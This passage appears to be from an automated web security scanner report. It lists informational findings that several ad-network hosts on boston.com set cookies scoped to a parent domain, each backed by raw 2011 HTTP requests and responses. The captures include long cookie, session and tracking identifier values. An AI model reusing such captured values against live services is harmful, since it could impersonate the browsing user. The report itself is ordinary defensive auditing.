Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Set-Cookie: STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/
Set-Cookie: STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

13.21. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:42:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:42:55 GMT
Last-Modified: Sun, 17 Jul 2011 20:42:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
Set-Cookie: evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com
Content-Length: 1472
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...

13.22. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: ANON_ID=aNnUgjyg6ANFA7ubQCktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGEvQjB0C4uEKV7RRQZa3O3qjyKF42ZaMEJ4b32BDDZdVMg6tF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Qm2emyb9ysdZdOpagBZdlUBA6RKMem3yjH2tm2TcZbG4aZbrxc

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1146
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1723665946 = [\r\n
...[SNIP]...

13.23. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:43:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

13.24. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:22 GMT
Expires: Tue, 19 Jul 2011 20:44:22 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

13.25. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=788D060407632FEEC1CAF36849FCD437&rsi_site=5B0808D11C7842FEE1E62BF14D546420&rsi_event=4F8AC0F46333C645B9A6CF1F71CCA4D9 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_RXmH="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LOs5qvUnENSYlaK0KznMNqgeVc7u11QLOt3H88u2n9J3K7ReVCPIvh9QMt5HFcvzlWMwCQvebSXlqBAu2RernYAut1NC6VxocQ4vI6YkKntNNFsTWurWvRLDQLcNSXvlo3q/IRrdGQU1wsVK2NaCDH6IkICSQMIi0mUJ2854sQbPCwbh0hzgPeYW5npxqXDrzKYQtXwMh261gIkuwsSjlh3ol5pPB8GHLODEm8H0ER2S9bWhnjh2tYo3iNC/lc4NLR5bHSiz1gdQzMLiSEbthA1LF+XISbspf4DHmymXcR3VSpWILtnCQwQN7hPGjaSKBzHNrko/5L3bMn9pBa6iFAEYhWP9BcF1F/i/zA/mxUODAkEVqHBJAW2hZvhtGtAbh6CxHCF590BUBYG1yzKp9meiHIHCaxsD3YWnIICKbkj4roH58T0PgLLzpZOuhSmgQvfVu8lS4fXzPRPlVk46rFWtdPVp9WNUKKNnblO4g6edoZMDNTHSve9WufpCPpkNsm5knJO4jO2Rn+w4MVqWp+/RlzhctdBgy7HqD4eQ6cVjIKEu3/phNdOSm5HMW0aFbYP3TuDjvAHMFJlBK4uBkL5Y1PKDMJV52dj5ZZAw8rW7AzPEzb4IPEP16HLfxV+g2yepzhdcGw3T3txYnFBZzd5Pp3hjrZtu1U69wCo9hgxKJG+BKk6kuBNZzQueRAMNzjrbkbE8zUi6EE1/RZoy4DGKY2NX9daazQm+XxGJes3OVrmAE5MsF6ZbUehi0of52dAwKyLkhmCL0I41uDlKvplCwcn4y06lg1h7jbxNf3aAhhjP8c/nPrsQg36KnFeCdkfIkyBe2kGXVRvl0gbIf/iNINeNuQNZgSandggonOrKXUtpC6Af7g694/87YlYLxmxqqRx9r0w+v05m7jNyS0zc6f4ZMw8g4pOgMMCbuE/NbDbXCtYYYjLUCP1NPutzZg2xYvgQ7BaTNOb4I3MBo7yxdbDq2n8dfZ8mOgQ1OGRoTjXjU9n/GaPEJvnrtHTtNPwDlw3ZmdMtNM+kJOfzwCLZ25xzFca5ZW0G9Ge1SkeCpQg62Ys6Uq4APCtUoG5fHvoIbTyh/oFjx5aam/gy2De3dPig88m9TdT1MpATdXXGm3gQW08DfgV7ZZK03srjxMvr4NUW+loKQUJs7AaPLF1vHjFfaSGn/fU4s+o+p1DGLJztcBPxJYm88RhIKEWcdZGqJflCuuD6t5UPS83XK+DDraRqA+U6FmZieutO26gVCGk71RTmD9Bh7fOgp7+5TwBFn1mm6NlX1Cn9kPiPyKy00fK3p9iJ3P2xj9w6+QFqDqb6etvHf2E8vb4oyjLaTNWBh5CBPOIQMDw1plT/HCto6JhNaitu5lv0zFEiT7IBCE7WI3JLhVo+pvYrxrta2PYndn+yK79yZuGwH+5yjJuylm9VtakAAY20JjiMK8yuOQM+SOxDds0F0vprgY5Y7xH+ANu4srSuqsysS9O+fpQ7OvNJ+Er9qxA=="; rsi_us_1000000="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"; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=MLun+AU1Zjhl58oJicYDKGOoh+glpORtThzANG1aBfZBrT1crkG1BbCYM408CuN9lQbF3aP4vgOJ1mIVRcbsqnd9em7gDHA1TIoEl2KoI2SgU4DA5EF1lXVsqfuVtURUfDlRbGMIwrPXqkTQ7ha/uqz9AYieh57Wl1R1Y1jVlCJtFijCZov3GG+/HzEWJJFPsshjNe+eXiR9QaN+nFIQwIuAnqrWN6OLs2utUQX1qLlAizz5SX1DY4ezfOcpkCrgkFCpWD1jpxUFSBd9kT0QO8lfwgL+MKkmgv9YurmtGVl4mgRDUrqi4EV2vm7677NG43lfljF81/2h3UQcvWTCROqFLqGTTGw9i7uhLLM9wmD6qiJYd+A504GkQmipymnz4zz+KJVBtht6ODBDRjch1v/Q9H0EVzkVdMH7LlvacBN6xVxFpq0/5sv3kFv9nQqHAD638rIvnoV5vHJmPEsSTPDQprR3Cqi6aS3z3efJB5Fe7NRa2Wxaw2lEgG+sN2BcFPE3dtH/7Hw70JwZoyPxbdbklPDPhWAaH0Q2BIFPO8C3p6hVpULE/9z53nAuqfuY4vymzFXDyY9vGdOvfsfoNe9C0w+FabpojVLoaKoHptlOSMDYPZV/Tmm8gD0qbz9Ql+737ttzGuAFouNSyp3mTuINVV/NGeiFZ/hPZyCj17mR7wGzyRp2a2Ayh6cUWQItrXRbEO4q19f7HHQfrXQmkxlZVigNiwD9Adfyt3Ltb9FpXu0LHvZiWWFy0I61APUr7NBHxEgIZw46qoJ3nPyYxEsj9BaAeIRk1MGz7wcwDToHsHSSqclZMH63LaUKE9lSpHKXI9N4/lZFyVpCAmpleREtf8uJwlmlrH7LSJFzPOUejuyk6cV/yIrEYLNDobIpwaLJfW+aA7kQa5TOfIWyiJpFE+znSHCvUDMrzXCYGcwryPSVn0y4vaOJrb15tx6uXNyTNhIGWsuRS4X2nehD4DtnkPoX8J+kXyt2hXK15AsoHvf8vIEOrlLEYyW2lgmGfPIScNIGRR/LpqazqArriUMpoAe9y5quzvOF0pgu6KaxnaEGxDXtvrorocQQjCjQEBaGndZRD1AJFydMGagXH